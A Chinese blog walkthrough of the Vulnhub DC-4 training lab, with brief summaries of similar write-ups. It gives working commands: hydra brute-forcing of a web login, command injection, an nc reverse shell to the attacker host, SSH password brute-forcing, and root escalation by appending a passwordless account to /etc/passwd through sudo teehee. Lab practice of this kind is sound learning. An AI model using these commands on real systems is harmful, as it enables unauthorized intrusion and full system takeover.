Vulnhub靶机DC系列-DC-4

最新推荐文章于 2023-02-17 10:04:09 发布
最新推荐文章于 2023-02-17 10:04:09 发布
阅读量686 收藏
点赞数 1
分类专栏: DC 笔记 文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54525483/article/details/122255129
版权
笔记 同时被 2 个专栏收录
16 篇文章 1 订阅
订阅专栏
DC
9 篇文章 1 订阅
订阅专栏
本文介绍了在Vulnhub靶场中对DC-4靶机的渗透测试过程,包括通过nmap扫描发现开放的80和22端口,使用dirb和Hydra进行目录扫描和爆破,最终通过命令执行和字典攻击实现权限提升至root。
摘要由CSDN通过智能技术生成

Vulnhub靶机DC系列-DC-4

靶场名称:DC-4
下载地址:

DC-4.zip (Size: 617 MB)
Download: http://www.five86.com/downloads/DC-4.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-4.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-4.zip.torrent   (
Magnet)

VMware->文件->打开->选中 .ova 文件,导入,会提示导入失败,点重试就完事了(双击.ova好像就直接导入了-_-)

打开DC靶机(网络适配器看一下是不是NAT模式,不然扫不出来)

kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-4靶机的网段

namp -sn x.x.x.x/x

在这里插入图片描述
DC-4靶机:192.168.210.143
kali攻击机网段:192.168.210.137

nmap 192.168.210.143 -sV

在这里插入图片描述可以看到开放端口80、22和操作系统
访问页面,就一个登录页面
在这里插入图片描述dirb扫一下目录,没啥有用信息,万能密码试过了无效,也没有注入点
在这里插入图片描述
使用hydra尝试爆破。
hydra使用说明参考:
https://blog.csdn.net/qq_40657585/article/details/84557478
https://zhuanlan.zhihu.com/p/397779150

hydra -l admin -P /usr/share/wordlists/metasploit/password.lst -s 80 192.168.210.143 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -f

在这里插入图片描述太慢了·····
换bp,换字典试试
在这里插入图片描述

运气不错

  • admin
  • happy
    进去看看,3条命令,抓包看看有没有命令执行
    在这里插入图片描述
    好像可以
    在这里插入图片描述
    看下权限在这里插入图片描述开始提权
    进行反弹shell,攻击机监听9999端口
  • 靶机执行 nc -e /bin/sh 192.168.3.20 9999
  • nc -lvvp 9999
    在这里插入图片描述在这里插入图片描述
    shell是无回响,python变成交互
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述看内核uname -a
为啥双写。。。但是不影响命令

在这里插入图片描述
3个用户
在这里插入图片描述
jim下有个类似字典文件,copy出来从22端口爆破他
在这里插入图片描述在这里插入图片描述

  • jim
  • jibril04

切换到jim用户

su jim

在这里插入图片描述
jim 用户下/var/mail目录下有封给jim的邮件
在这里插入图片描述老板让他把密码给jim

  • charles
  • ^xHhA&hvim0y

切换到charles用户
在这里插入图片描述
查看可以使用的root权限命令
在这里插入图片描述使用teehee命令添加一个root权限的账号

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

在这里插入图片描述
su admin 即为root权限,密码为空
在这里插入图片描述
提权成功

在这里插入图片描述靶机结束

Green_Hand_01
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机实操:vulnhub-DC4
不想当脚本小子的脚本小子
12-07 206
照例先信息收集:IP:192.168.249.137 开放了22ssh端口以及80端口,web服务器的nginx1.15.10,主界面是一个登录框(能否sql注入?能否暴力破解?)。 看看 ngnix有没有什么漏洞,发现没有: 扫后台也没得到什么有效的信息: 看看网页源码有没有什么提示,还是没有什么有价值的,那就只能直接爆破了,这里我使用burpsuite来抓包爆破 这里我使用的是john里面的字典,因为我觉得一个靶机可能,不值得一个几十个G的密码字典来爆: 最后登录成
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1902
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 438
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2406
Vulnhub-DC-4靶机实战
vulnhubDC4靶机
LainWith的博客
08-15 1087
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
vulnhub系列靶机--DC4
cyzCc的博客
02-23 802
vulnhub系列靶机DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
[VulnHub]DC-4
cosmoslin的博客
09-07 141
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 466
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
Vulnhub靶场渗透-DC-4
paidx0
10-21 261
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 223
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
vulnhub-DC-4靶机渗透记录
nareku的博客
07-02 221
浅浅记录一下将靶机导入vm,设置成NAT模式靶机IP未知kail的IP1.1利用namp来进行ip端口检测可以检测到ip为192.168.178.132的靶机,并且开放了22端口和80端口再用nmap对所有的端口扫一下。
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3150
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2281
vulnhub DC-4靶机实战
vulnhubDC7靶机
LainWith的博客
02-14 1495
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2211
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
vulnhub靶机 djinn1
witwitwiter的博客
09-10 3636
vulnhub靶机 djinn:1 靶机地址djinn: 1 ~ VulnHub 目标为user.txt和root.txt 靶机配置 将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。 渗透测试 使用nmap进行扫描 └─# nmap -p- -A -T4 192.168.5.130 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST Nmap scan report f
DC-4靶机
最新发布
Flamingo1998的博客
02-17 166
DC-4靶机
DC4靶机
qq_40646572的博客
04-29 321
靶机信息搜集 发现DC4靶机是192.168.220.208,DC4靶机开启端口是22,80端口。 防止端口信息遗漏,扫描全部端口,nmap默认扫描端口0-1000。 端口扫描完成后,使用nmap脚本漏洞扫描。发现没有可以利用的漏洞。 尝试对靶机进行攻击 打开80端口的http服务,查看目标主机网站是否存在可以打穿到后台的漏洞。 首先进行目录扫描。 未搜集到任何可以利用的信息。。。 下面有两种思路,一种尝试sql注入,另一种,爆破http登录或者ssh爆破。 先尝试sql注入,失败。。。。 下.
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1948
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值